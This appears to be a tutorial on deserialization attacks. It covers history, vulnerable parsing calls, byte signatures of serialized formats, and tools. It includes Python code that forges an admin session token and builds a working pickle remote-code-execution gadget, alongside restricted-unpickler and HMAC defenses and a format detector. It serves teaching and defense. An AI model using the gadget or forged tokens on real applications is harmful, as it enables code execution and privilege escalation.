Introduction to Deserialization Attacks
Introduction
If an application ever deserializes user-controlled data, a deserialization attack is possible, because the deserializer reconstructs whatever objects the input describes. An attack involves one of two things:
Modifying serialized data generated by the application (tampering with values the server trusts)
Generating and supplying custom serialized data (a payload the application never produced)
History
2011 - Deserialization first recognized as an attack vector
2015 - Security researchers @frohoff and @gebl released ysoserial (Java deserialization payload generator)
2016 - The "Java Deserialization Apocalypse" went viral (Apache Commons Collections gadget chains affecting many Java products)
Now - OWASP Top 10: A08:2021 Software and Data Integrity Failures (absorbed A8:2017 Insecure Deserialization)
Attack Types
Object Injection
Modifying serialized data so the server receives unintended information upon deserialization.
Example: Modifying a serialized object containing user role to gain admin privileges.
Remote Code Execution
Supplying a serialized payload that results in command execution upon deserialization.
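Both attack types, and the two controls that stop them, in Python's pickle. This is an added example, not code from the original page: the session-token app, the secret key and the Gadget class are constructed for the demo. Object injection is a role edit on the app's own pickle; RCE is a custom pickle whose __reduce__ names a callable (eval here, so the demo is deterministic; os.system would load the same way). The hardened side signs the token with HMAC before it leaves the server and restricts which globals the unpickler may resolve.

```python
import hashlib
import hmac
import io
import pickle

# Constructed demo key (assumption: a real application loads this from a secret store)
SECRET_KEY = b"constructed-demo-key-not-for-production"


# --- the application's vulnerable session handling -------------------------
def make_session_token(username: str, role: str) -> bytes:
    """The app pickles a session dict and hands it to the client (e.g. in a cookie)."""
    return pickle.dumps({"user": username, "role": role})


def vulnerable_load_session(token: bytes):
    """Vulnerable: pickle.loads on bytes the client controls."""
    return pickle.loads(token)


# --- attack 1: object injection (modify serialized data the app generated) --
def forge_admin_token(token: bytes) -> bytes:
    """Attacker unpickles their own token, edits the role, and re-pickles it."""
    session = pickle.loads(token)
    session["role"] = "admin"
    return pickle.dumps(session)


# --- attack 2: remote code execution (supply custom serialized data) --------
class Gadget:
    """__reduce__ tells the unpickler: on load, call this callable with these args.
    The pickle stores a reference to builtins.eval, so the class itself never
    needs to exist on the server."""

    def __init__(self, expression: str):
        self.expression = expression

    def __reduce__(self):
        return (eval, (self.expression,))


def rce_payload(expression: str) -> bytes:
    return pickle.dumps(Gadget(expression))


# --- control 1: restrict the globals the unpickler may resolve ---------------
# Plain dict/str/int pickles need no globals, so an empty allowlist suffices here.
ALLOWED_GLOBALS = set()


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def payload_blocked(data: bytes) -> bool:
    """True if the restricted unpickler refuses the payload."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# --- control 2: authenticate the token so tampering is detected before parsing
def sign_token(token: bytes) -> bytes:
    mac = hmac.new(SECRET_KEY, token, hashlib.sha256).digest()
    return mac + token  # 32-byte tag followed by the pickle


def load_signed_session(signed: bytes):
    mac, token = signed[:32], signed[32:]
    expected = hmac.new(SECRET_KEY, token, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None  # tampered or forged: never hand it to the unpickler
    return restricted_loads(token)
```

The allowlist closes the gadget route only for globals; the Python documentation is explicit that pickle is not safe against malicious input, so the signature (or not using pickle for client-held data at all) is the control that actually carries the weight.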
Identifying Serialization
White-Box (Source Code Access)
Look for the calls that turn attacker-supplied bytes back into objects:
PHP
unserialize()
Python Pickle
pickle.load() / pickle.loads()
Python JSONPickle
jsonpickle.decode()
Python PyYAML
yaml.load() without Loader=SafeLoader (and yaml.unsafe_load())
Java
ObjectInputStream.readObject()
C# / .NET
BinaryFormatter.Deserialize() (and the other formatters' Deserialize())
Ruby
Marshal.load()
Black-Box (No Source Code)
Identify serialized data by its signature (language/library, then what its output looks like):
PHP
a:4:{i:0;s:4:"Test";...}
Python Pickle protocol 0 (Python 2.x default; printable ASCII opcodes)
(lp0\nS'Test'\np1\n...
Python Pickle protocol 1 (Python 2.x)
No 80 xx header: begins directly with a binary opcode, e.g. ]q followed by a null byte for a list, }q for a dict
Python Pickle protocol 2 (Python 2.3+)
Hex: 80 02 ...
Python Pickle protocol 3 (Python 3.0-3.7 default)
Hex: 80 03 ...
Python Pickle protocol 4 (Python 3.8+ default)
Hex: 80 04 95 ... (95 is the FRAME opcode)
Python Pickle protocol 5 (Python 3.8+)
Hex: 80 05 95 ...
JSONPickle (Python 2.7/3.6+)
["Test", "Data", [4], "ACADEMY"] (plain JSON; serialized objects carry py/object keys)
PyYAML / ruamel.yaml
- Test\n- Data\n...
Java
Hex: AC ED 00 05 73 72 / Base64: rO0ABXNy (AC ED 00 05 is the stream magic and version; 73 72 = TC_OBJECT TC_CLASSDESC)
C# / .NET (BinaryFormatter)
Hex: 00 01 00 00 00 FF FF FF FF / Base64: AAEAAAD/////
Ruby (Marshal)
Hex: 04 08 (Marshal format version 4.8)
Tools
Freddy - Burp Suite extension for detecting and exploiting Java/.NET serialization
ysoserial - Java deserialization payload generator
Identifying Language from Serialized Data
Example: Ruby Detection
Hex bytes starting with 04 08 → Ruby (Marshal format version 4.8)
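The black-box signature table and the Ruby detection example above, turned into a detector. This is an added example, not code from the original page: the magic prefixes and opcode facts are those of the formats themselves, the PHP/YAML/base64 regexes and the protocol 0/1 pickle checks are heuristics written for this demo, and the sample blobs (including the py/object jsonpickle document) are constructed. It also handles the case the table only implies: a blob that arrives base64-wrapped in a cookie or parameter is decoded once and re-checked.

```python
import base64
import json
import pickle
import re

# Fixed magic prefixes of the binary formats (format facts, not guesses)
MAGIC_PREFIXES = [
    (b"\xac\xed\x00\x05", "Java ObjectOutputStream"),
    (b"\x00\x01\x00\x00\x00\xff\xff\xff\xff", ".NET BinaryFormatter"),
    (b"\x04\x08", "Ruby Marshal 4.8"),
]

# PHP serialize(): a:<n>:{, O:<len>:"<class>", s:<len>:", i:<n>;, b:<0|1>;, d:<float>;, N;
PHP_RE = re.compile(rb"^(?:[aOs]:\d+:|[ibd]:-?[\d.]+;|N;)")
# YAML: document marker, block sequence item, or a top-level "key: " mapping (heuristic)
YAML_RE = re.compile(rb"^(?:---|- |[A-Za-z_][\w-]*:\s)")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def _pickle_protocol(data: bytes):
    """Return the pickle protocol number, or None if this does not look like a pickle."""
    # Protocols 2-5 start with the PROTO opcode 0x80 followed by the version byte.
    if data[0] == 0x80 and 2 <= data[1] <= 5:
        return data[1]
    # Protocol 0 is printable ASCII opcodes ending in STOP ('.'); heuristic on the root opcode.
    if data.endswith(b".") and data[:1] in b"(cSIFLNV" and all(
        32 <= b < 127 or b == 0x0A for b in data
    ):
        return 0
    # Protocol 1 has no PROTO header; heuristic: list/dict root followed by BINPUT 'q'.
    if data.endswith(b".") and data[:2] in (b"]q", b"}q"):
        return 1
    return None


def _has_py_keys(obj) -> bool:
    """jsonpickle marks Python objects with reserved keys such as py/object, py/type, py/id."""
    if isinstance(obj, dict):
        return any(str(k).startswith("py/") for k in obj) or any(
            _has_py_keys(v) for v in obj.values()
        )
    if isinstance(obj, list):
        return any(_has_py_keys(v) for v in obj)
    return False


def identify_serialization(data: bytes, _nested: bool = False) -> str:
    data = data.strip()
    if len(data) < 2:
        return "unknown"
    for magic, name in MAGIC_PREFIXES:
        if data.startswith(magic):
            return name
    proto = _pickle_protocol(data)
    if proto is not None:
        return f"Python pickle protocol {proto}"
    if PHP_RE.match(data):
        return "PHP serialize()"
    if data[:1] in b"[{":
        try:
            if _has_py_keys(json.loads(data)):
                return "jsonpickle"
            return "JSON (plain; jsonpickle output without objects looks identical)"
        except ValueError:
            pass
    if YAML_RE.match(data):
        return "YAML (PyYAML / ruamel.yaml)"
    # Serialized blobs are often base64-wrapped in cookies or parameters: decode once and retry.
    if not _nested and len(data) % 4 == 0 and B64_RE.match(data):
        try:
            decoded = base64.b64decode(data, validate=True)
        except ValueError:
            return "unknown"
        inner = identify_serialization(decoded, _nested=True)
        if inner != "unknown":
            return "base64-encoded " + inner
    return "unknown"


def sample_pickles() -> dict:
    """Constructed samples: the page's example list pickled with each protocol 0-5."""
    return {p: pickle.dumps(["Test", "Data", [4], "ACADEMY"], protocol=p) for p in range(6)}
```

Run it over every suspicious cookie, hidden field and query parameter; a hit on the Java or .NET magic is exactly what Freddy keys on, and a pickle or PHP hit tells you which payload generator to reach for next.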